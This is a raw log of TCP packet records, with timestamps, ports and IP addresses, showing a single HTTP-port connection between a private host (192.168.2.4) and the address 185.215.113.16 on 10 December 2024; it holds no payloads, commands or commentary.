Dec 10, 2024 00:42:39.969713926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.072890997 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.072968006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.073059082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.073106050 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.073414087 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.073460102 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.073601007 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.073643923 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.074445009 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.074496984 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.074635983 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.074681997 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.075640917 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.075692892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.108675957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.108760118 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.108836889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.108978987 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.109190941 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.109234095 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.109380960 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.109431982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.110306025 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.110352993 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.110666990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.110717058 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.110830069 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.110922098 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.111916065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.111962080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.112112045 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.112157106 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.112929106 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.112994909 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.113100052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.113167048 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.114058971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.114106894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.114213943 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.114262104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.115080118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.115127087 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.115235090 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.115283966 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.116260052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.116307020 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.116436958 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.116487980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.117285013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.117335081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.117439032 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.117486000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.118304014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.118347883 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.118469954 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.118515015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.119467974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.119513988 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.119626999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.119674921 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.120490074 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.120536089 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.120673895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.120723963 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.120955944 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.121002913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.121040106 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.121089935 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.123267889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.123330116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.123472929 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.123518944 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.124561071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.124573946 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.124614000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.124892950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.124939919 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.125102997 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.125149965 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.126178980 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.126190901 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.126230955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.127163887 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.127177000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.127218962 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.128396988 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.128408909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.128449917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.129348040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.129391909 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.129525900 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.129575014 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.130348921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.130393028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.130491972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.130542040 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.131527901 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.131580114 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.131700993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.131747961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.132663965 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.132709980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.132838964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.132880926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.133788109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.133806944 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.133833885 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.133846045 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.134731054 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.134778023 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.134934902 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.134977102 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.135884047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.135934114 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.136079073 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.136122942 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.137032032 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.137078047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.137233973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.137280941 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.138199091 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.138209105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.138246059 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.139214993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.139262915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.139383078 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.139429092 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.140336990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.140382051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.140530109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.140573978 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.141520023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.141531944 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.141568899 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.142435074 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.142486095 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.142631054 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.142677069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.142838955 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.142884970 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.142988920 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.143035889 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.143990993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.144041061 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.144196987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.144243956 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.145098925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.145140886 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.145160913 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.145198107 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.146141052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.146190882 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.146241903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.146276951 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.147248030 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.147300959 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.147380114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.147425890 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.148324013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.148370981 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.148471117 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.148514986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.149497986 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.149543047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.149677038 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.149722099 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.150594950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.150640965 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.150665998 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.150707006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.151622057 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.151665926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.151725054 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.151766062 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.152695894 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.152744055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.152808905 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.152851105 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.153809071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.153855085 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.153907061 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.153949022 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.154947042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.154989958 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.155047894 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.155092955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.155992031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.156039000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.156089067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.156126976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.157129049 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.157171011 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.157190084 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.157233000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.158200979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.158247948 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.158288956 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.158335924 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.159272909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.159332037 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.159384966 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.159431934 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.160389900 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.160439014 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.160461903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.160547972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.161473989 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.161519051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.264343977 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.264468908 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.264497042 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.264509916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.264925003 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.264971018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.264991045 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.265100002 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.266004086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.266051054 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.266088963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.266134024 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.267083883 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.267489910 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.300380945 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.300467968 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.300635099 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.300806046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.300848007 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.300898075 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.301881075 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.301930904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.301937103 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.302983999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.303035021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.303057909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.303093910 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.304131985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.304158926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.304208994 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.305176973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.305284977 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.305327892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.306273937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.306322098 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.306386948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.307068110 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.307383060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.307435989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.307497978 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.307544947 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.308456898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.308504105 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.308516979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.308561087 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.309562922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.309619904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.309628963 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.309660912 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.310681105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.310745001 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.310770035 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.310810089 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.311758041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.311815023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.311862946 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.312866926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.312941074 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.312992096 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.313920021 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.313966036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.314079046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.314120054 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.315078020 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.315130949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.315193892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.316160917 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.316241026 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.316260099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.317207098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.317255974 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.317358017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.318304062 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.318366051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.318388939 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.319097042 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.319391966 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.319504976 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.319551945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.320488930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.320631981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.320679903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.321568012 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.321618080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.321688890 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.322716951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.322760105 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.322767973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.323043108 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.324506044 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.324553013 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.324621916 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.324665070 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.325690031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.325737000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.325793982 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.325839996 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.325968981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.326014996 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.326078892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.326124907 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.327101946 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.327148914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.327188969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.327243090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.328174114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.328219891 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.328284979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.328329086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.329268932 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.329313040 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.329387903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.329427004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.330856085 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.330949068 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.331008911 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.331481934 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.331612110 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.331665039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.332547903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.332689047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.332750082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.333656073 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.333719969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.333756924 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.334738970 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.334799051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.334840059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.335151911 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.335860968 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.335999966 CET	80	49759	185.215.113.16	192.168.2.4
